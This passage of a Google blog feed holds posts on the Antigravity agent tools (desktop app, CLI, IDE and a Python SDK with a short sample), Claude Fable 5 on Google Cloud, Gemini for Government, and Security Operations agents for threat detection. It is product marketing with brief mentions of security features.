&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Antigravity CLI&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Antigravity IDE&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Antigravity SDK&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Interface&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Desktop App&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Terminal (TUI)&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Desktop App&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Python Code&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Best For&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Multiple simultaneous tasks&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Command-line / Headless&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Directly editing code&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Building custom agents&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;The Four Surfaces of Antigravity&lt;/h2&gt;
&lt;h3&gt;1. Antigravity 2.0&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The default recommendation. Manages tasks across multiple projects at the same time.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="antigravity-new-chat" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/antigravity-new-chat.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Antigravity 2.0 is a standalone desktop application. It is designed to let you run multiple tasks without blocking your main workspace. You can easily switch between and monitor different projects from one screen. You can also schedule tasks to run on a regular schedule to check code quality or find outdated packages.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;2. Antigravity CLI&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For terminal workflows and headless execution.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="antigravity-cli" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/antigravity-cli.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Built in Go for speed, the Antigravity CLI is for those who prefer to work in the terminal with fast, keyboard-driven navigation and simple shortcuts. You can start background agents using terminal commands without locking up your active command-line window. Choose the CLI if you need headless execution (such as working over SSH or inside remote containers).&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;3. Antigravity IDE&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For developers who want to see and edit the code directly.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="antigravity-ide" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/antigravity-ide.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;The IDE surface puts agents directly inside your current workspace. This is the best choice if you want to see exactly what code the agent is editing and accept or reject changes line-by-line. With built-in debugging, the agent can see runtime errors and offer a one-click fix right in your editor.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;4. Antigravity SDK (Python)&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Best for: Writing custom agent logic and automated pipelines.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;import asyncio\r\nfrom google.antigravity import Agent, LocalAgentConfig\r\n\r\nasync def main():\r\n    config = LocalAgentConfig(\r\n        system_instructions=&amp;quot;You are an expert assistant for codebase navigation.&amp;quot;,\r\n        # api_key=&amp;quot;your_api_key_here&amp;quot;,\r\n    )\r\n    async with Agent(config) as agent:\r\n        response = await agent.chat(&amp;quot;What files are in the current directory?&amp;quot;)\r\n        print(await response.text())\r\n\r\nasync def run():\r\n    await main()\r\n\r\nif __name__ == &amp;quot;__main__&amp;quot;:\r\n    asyncio.run(run())&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;lang-py&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f2f546b2610&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;a href="https://antigravity.google/docs/sdk-overview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity SDK&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a Python library that lets you build your own custom agents from scratch. Because it runs on the same shared harness, you get direct access to the exact same tools and rules that power Google’s official Antigravity tools. You can write an agent locally and deploy it to Google Cloud with zero code changes.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While each interface looks different, they all run on the same underlying agent harness. No matter which of the Antigravity surfaces you choose, you get support for &lt;/span&gt;&lt;a href="https://antigravity.google/docs/plugins" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;plugins&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://antigravity.google/docs/skills" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;skills&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and more. Your agents have access to the same core logic, so pick the one that works best for your project.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;For guides and documentation, visit &lt;/span&gt;&lt;a href="https://antigravity.google" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;antigravity.google&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and when you’re ready to get started, visit the &lt;/span&gt;&lt;a href="https://antigravity.google/download" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Antigravity Download Page&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/choosing-your-surface-antigravity-20-antigravity-cli-antigravity-ide-or-antigravity-sdk/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-10T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud/</id>
    <title>Claude Fable 5: Available on Google Cloud</title>
    <updated>2026-06-09T18:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Claude Fable 5&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, Anthropic’s latest frontier model, is now generally available on Google Cloud.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; This launch is the latest proof point of our ongoing commitment to bring the industry's latest models straight to our Agent Platform. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Claude Fable 5 brings the best of Anthropic model capabilities to all customers, with strong safeguards designed to make it safe for general use. Designed for complex, multi-step reasoning, Claude Fable 5 is good for demanding tasks like advanced software development, long-horizon agents, and deep multimodal document analysis. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;For more information about this release, visit Anthropic’s &lt;/span&gt;&lt;a href="https://www.anthropic.com/news/claude-fable-5-mythos-5" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Build with&lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/publishers/anthropic/model-garden/claude-fable-5"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; Claude Fable 5&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and other models from Anthropic — including Claude Opus 4.8 and Claude Sonnet 4.6 — today on &lt;/span&gt;&lt;a href="https://cloud.google.com/model-garden?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-09T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/public-sector/gemini-for-government-your-blueprint-for-mission-impact/</id>
    <title>Gemini for Government: Your blueprint for mission impact</title>
    <updated>2026-06-09T17:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;The public sector has reached a critical inflection point. For years, organizations have explored what’s possible through isolated AI pilots and experimentation. Today, the question has shifted to “what creates impact?” where the focus is no longer on hypotheticals, but on achieving real productivity gains, improving services and outcomes, and advancing your mission - &lt;i&gt;right now.&lt;/i&gt; Meeting this moment requires more than just a powerful model—it requires an integrated approach with the security, reliability, scale, and cost-efficiency that public sector missions require.&lt;/p&gt;&lt;p&gt;Today, public sector organizations are moving swiftly from AI assistants and chatbots to a full-scale agentic taskforce - here’s how they are doing it.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Building on a unified foundation&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;To move AI and agents into production at scale, you need to remove the friction of integration. Google Cloud offers a complete AI stack designed to work as one unified system. We believe this integrated stack is the engine for true transformation in the agentic era.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="GC_Stack" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/GC_Stack.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;Let’s take a closer look at this integrated stack:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;It all starts with the AI Hypercomputer&lt;/b&gt; — our purpose-built infrastructure foundation is optimized for the physics and scale of the agentic era, and powered by both GPUs and TPUs. We continue to invest in our portfolio and made several announcements at Cloud Next ‘26 including the launch of our &lt;a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive?e=48754805"&gt;eighth-generation TPU&lt;/a&gt; and updates to our &lt;a href="https://cloud.google.com/blog/products/compute/cross-cloud-infrastructure-at-next26?e=48754805"&gt;cross-cloud infrastructure&lt;/a&gt; which includes new innovations across fluid compute, secure cross-cloud connectivity, the unified data layer and digital sovereignty.&lt;/li&gt;&lt;li&gt;We deliver &lt;b&gt;research from Google DeepMind as well as frontier models&lt;/b&gt; to provide intelligence with speed and efficiency. We offer choice across Google’s leading models like our recently announced &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/innovations-from-google-io-26-on-google-cloud?e=48754805#:~:text=Expand%20what%E2%80%99s%20possible%20with%20Gemini%203.5"&gt;Gemini 3.5&lt;/a&gt; alongside other open and third-party options.&lt;/li&gt;&lt;li&gt;Our &lt;b&gt;agentic data cloud&lt;/b&gt; grounds your AI in trusted real-time organizational truth and context. We help you build a 'system of action' with our latest breakthroughs announced at Cloud Next ‘26 including the &lt;a href="https://cloud.google.com/transform/shift-system-of-action-architecting-the-agentic-data-cloud-AI?e=48754805#:~:text=Solving%20the%20walled,massive%20egress%20fees."&gt;Cross-cloud Lakehouse&lt;/a&gt; and &lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-the-google-cloud-knowledge-catalog?e=48754805"&gt;Knowledge Catalog&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;With our &lt;b&gt;agentic defense&lt;/b&gt; you get &lt;a href="https://cloud.google.com/learn/what-is-zero-trust?e=48754805"&gt;zero-trust&lt;/a&gt; protection that secures your entire AI lifecycle from code to cloud. To help you navigate the agentic era securely, we recently launched &lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense?e=48754805"&gt;Google AI Threat Defense&lt;/a&gt; — an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your organization.&lt;/li&gt;&lt;li&gt;At Cloud Next ‘26 we unveiled &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform?e=48754805"&gt;Gemini Enterprise Agent Platform&lt;/a&gt;, our comprehensive platform to build, scale, govern and optimize agents with architectural rigor. This platform brings together model selection, model building, and agent building capabilities with new features for agent integration, development, orchestration, and security.&lt;/li&gt;&lt;li&gt;All of this comes together at the top with pre-built specialized &lt;b&gt;agents&lt;/b&gt; and &lt;b&gt;applications&lt;/b&gt; that are ready to transform your organization from day 1. We announced new capabilities at Cloud Next ‘26 including &lt;a href="https://workspace.google.com/blog/product-announcements/introducing-workspace-intelligence" target="_blank"&gt;Workspace Intelligence&lt;/a&gt; - a secure and dynamic system that inherently understands complex semantic relationships within your Workspace apps (such as Docs, Slides, or Gmail), your active projects, your collaborators, and your organization's domain knowledge.&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;&lt;b&gt;Delivering uncompromising security and control&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;For many public sector organizations, security &lt;i&gt;is&lt;/i&gt; the mission. This new era of mission-ready and secure AI is defined by the ability to work across silos and legacy systems. IT system administrators have access to a built-in AI Control Dashboard—a single pane of glass to centrally visualize, secure, and audit the organization’s entire AI estate. Through &lt;a href="https://docs.cloud.google.com/agent-registry/overview"&gt;Agent Registry&lt;/a&gt;, administrators maintain complete visibility into active agents and their grounded data sources, ensuring that every interaction stays within the strict guardrails of agency policy and security mandates. &lt;a href="https://cloud.google.com/security/products/model-armor?e=48754805"&gt;Model Armor&lt;/a&gt; provides comprehensive protections against prompt injection, sensitive data leaks, and harmful content. Built on a &lt;a href="https://cloud.google.com/learn/what-is-zero-trust?e=48754805"&gt;Zero Trust foundation&lt;/a&gt;, Gemini for Government includes FedRAMP High-authorized security and compliance features and is backed by a Data Privacy Guarantee stating that Google does not train its foundational models on customer data. At &lt;a href="https://cloud.google.com/blog/products/identity-security/next26-redefining-security-for-the-ai-era-with-google-cloud-and-wiz?e=48754805"&gt;Google Cloud Next ‘26,&lt;/a&gt; we introduced new development tools to secure AI-generated code and mitigate the risk of shadow AI, and also shared how we are protecting AI and cloud apps across any infrastructure with &lt;a href="https://cloud.google.com/blog/products/identity-security/google-completes-acquisition-of-wiz?e=48754805"&gt;Wiz&lt;/a&gt;.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Scaling agents across the organization&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;In order to realize AI’s true potential, it must be in the hands of your people — caseworkers, inspectors, analysts and more. Google Public Sector was proud to be the first technology provider to offer an enterprise AI tool, Gemini for Government, through GenAI.mil to more than three million civilian and military personnel. We recently introduced a &lt;a href="https://cloud.google.com/blog/topics/public-sector/gemini-for-government-build-custom-ai-agents-for-unclassified-work-on-genaimil/?e=48754805"&gt;new feature within Gemini for Government&lt;/a&gt; on GenAI.mil called Agent Designer which enables DoW civilian and military personnel to build their own agents to support unclassified work tasks.&lt;/p&gt;&lt;p&gt;With &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/agent-designer"&gt;Agent Designer&lt;/a&gt;, non-technical users can build sophisticated AI agents using natural language through no-code interfaces. Our goal is to provide the tools to empower &lt;i&gt;everyone&lt;/i&gt; in the organization to build and use agents that connect securely to existing systems and enterprise applications. This is all about using AI and agents to automate manual and time consuming tasks, improve productivity, and ensure you and your teams can apply your experience and judgment to the most critical aspects of your work.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Achieving tangible ROI&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;According to our recent &lt;a href="https://cloud.google.com/blog/topics/public-sector/key-insights-from-our-inaugural-survey-on-the-roi-of-ai-in-the-public-sector/?e=48754805"&gt;ROI of AI in the public sector report&lt;/a&gt;, agentic and generative AI is already helping public sector teams get more done. According to our findings, &lt;b&gt;70%&lt;/b&gt; of public sector leaders report improved productivity from gen AI. Of those reporting productivity, &lt;b&gt;46%&lt;/b&gt; say employee productivity has at least doubled. This directly translates into faster response times, more efficient public services, and overall better outcomes. &lt;a href="https://ai.google.dev/gemini-api/docs/interactions/deep-research" target="_blank"&gt;Gemini Deep Research Agent&lt;/a&gt; and &lt;a href="https://notebooklm.google/?gad_source=1&amp;amp;gad_campaignid=22476587015&amp;amp;gbraid=0AAAAA-fwSsc9O8X8TnAEA8uvL58QrYtN-&amp;amp;gclid=Cj0KCQjwz9_QBhD_ARIsADnSCfAm5Xad2GqSBZtd00eB3Rjlt5IcFDwMkdE5gbYKh_u4ss7UGIFNeH8aAkNhEALw_wcB" target="_blank"&gt;NotebookLM&lt;/a&gt; are force multipliers for the public sector, transforming how complex research, deep work and analysis is conducted.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Your blueprint for mission impact&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;With Gemini for Government, you are able to move beyond AI exploration and pilots, to real world applications and agents - at scale. This is all about applying technology to amplify human capacity, accelerate strategic decision-making, and advance your mission.&lt;/p&gt;&lt;p&gt;Register to attend our &lt;a href="https://cloudonair.withgoogle.com/events/gemini-for-government-the-blueprint-for-mission-impact?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-northam-PUB39634-onlineevent-er-q2-26-g4g-webinar&amp;amp;utm_content=kd_bp&amp;amp;utm_term=-" target="_blank"&gt;Gemini for Government webinar&lt;/a&gt; on June 11 where we’ll dive deeper into how to leverage data, security, and an integrated AI stack. Whether you are looking to scale day-one use cases across your organization, empower your internal champions, or are just getting started, you will leave with a clear path forward to drive impact and advance your mission today.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/public-sector/gemini-for-government-your-blueprint-for-mission-impact/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-09T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/google-fi-wireless/international-travel-features-5g-coverage/</id>
    <title>Get travel-ready with Google Fi Wireless</title>
    <updated>2026-06-09T16:15:00+00:00</updated>
    <content type="html">Text "Great travel plans need a great phone plan" surrounded by photos of people on their phones and wifi symbols</content>
    <link href="https://blog.google/products-and-platforms/products/google-fi-wireless/international-travel-features-5g-coverage/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-09T16:15:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4-builders/</id>
    <title>See what 3 builders are making with Gemma 4</title>
    <updated>2026-06-09T16:00:00+00:00</updated>
    <content type="html">"Gemma 4" is in the center with photos surrounding of a piano, lion, music, a person, and an English tutoring app interface</content>
    <link href="https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4-builders/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-09T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/research/co-scientist-research-problems/</id>
    <title>4 ways researchers are collaborating with Co-Scientist to solve big problems</title>
    <updated>2026-06-09T16:00:00+00:00</updated>
    <content type="html">Colorful, stylized, spiky molecular structures</content>
    <link href="https://blog.google/innovation-and-ai/technology/research/co-scientist-research-problems/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-09T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents/</id>
    <title>Detecting and containing AI-powered threats with Google Security Operations agents</title>
    <updated>2026-06-09T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;To defend against the growing range of AI-accelerated threat actors, organizations need to be able to respond faster to outpace the adversary.&lt;/p&gt;&lt;p&gt;Recently, &lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense"&gt;we announced Google AI Threat Defense&lt;/a&gt;, an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your business. Based on Google’s own approach to today’s threats and vulnerability management, it’s centered on a four-step framework: Prepare, scan and prioritize, remediate, and monitor.&lt;/p&gt;&lt;p&gt;Today, we’re sharing more details on how &lt;a href="https://cloud.google.com/security/products/security-operations"&gt;Google Security Operations&lt;/a&gt; works in concert with AI Threat Defense to monitor, detect, and respond to threats, particularly from code you do not own or can not patch. The remediation gap represents a critical vulnerability.&lt;/p&gt;&lt;p&gt;According to &lt;a href="https://services.google.com/fh/files/misc/m-trends-2026-executive-edition-en.pdf" target="_blank"&gt;M-Trends 2026&lt;/a&gt;, the exploitation of vulnerabilities has become the most common initial infection vector. Notably, the report also indicates that the mean time to exploit has dropped to an estimated minus seven days, meaning exploitation frequently occurs even before a patch is officially released. Google Security Operations delivers vital operational fabric to autonomously contain active attacks across your entire environment.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="AI Threat Wheel - 4 Monitor" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/AI_Threat_Wheel_-_4_Monitor.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Google Security Operations supports AI Threat Defense to monitor, detect, and respond to threats.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;Engineered around a comprehensive approach that uses compensating controls with proactive security to strengthen operational resilience, Google Security Operations is built on a strategic, three-part approach to cross-environment visibility across your entire attack surface:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Continuous and autonomous coverage analysis and detection generation&lt;/li&gt;&lt;li&gt;Autonomous investigation, containment, and response&lt;/li&gt;&lt;li&gt;Retroactive hunting&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Designed to help you see and respond to threats faster than ever before, we deliver these capabilities at machine-scale and machine-speed. Together with &lt;a href="https://cloud.google.com/security/ai-threat-defense"&gt;Google AI Threat Defense&lt;/a&gt;, we’re able to provide the autonomous platform you need to outpace AI-driven attacks.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;1. Continuous and autonomous coverage analysis and detection generation&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;While proactive defense can identify vulnerabilities before they can be exploited, there will be applications that you can not patch, as well as potential gaps in the time it takes to remediate vulnerabilities.&lt;/p&gt;&lt;p&gt;The &lt;a href="https://www.verizon.com/business/resources/T3ef/reports/2026-dbir-data-breach-investigations-report.pdf" target="_blank"&gt;2026 Verizon Data Breach Investigations Report&lt;/a&gt; underscores the magnitude of this challenge. In a study encompassing over 13,000 organizations, only 26% of vulnerabilities identified on the CISA Known Exploited Vulnerabilities (KEV) list had been fully remediated. Moreover, the median duration required to achieve full patching after detection stands at 43 days. Clearly, you still need continuous monitoring to detect threats in your environments.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=h9rejA7OAxI"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Detection Engineering agent. Results for illustrative purposes.&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Detection Engineering agent. Results for illustrative purposes.&lt;/h4&gt;
        
        
          &lt;p&gt;Detection Engineering agent. Results for illustrative purposes.&lt;/p&gt;
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=h9rejA7OAxI"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;The &lt;b&gt;Detection Engineering agent&lt;/b&gt; in Google Security Operations can automatically translate new exploitation patterns of unpatched vulnerabilities into custom detections for your specific environment. Available in preview, it analyzes a diverse array of input sources to quickly and effectively recognize malicious activity, so you can uncover novel attack patterns evolving from new and unpatched vulnerabilities.&lt;/p&gt;&lt;p&gt;The agent’s sources include Google Threat Intelligence (such as emerging threat intelligence, new attack patterns curated by Mandiant, offensive tool repositories, red and purple team reports, autonomous malware analysis, open-source detection repositories and blogs), and internal security telemetry.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Blog_AgenticDetection workflow" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Blog_AgenticDetection_workflow.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;The workflow of the Detection Engineering agent.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
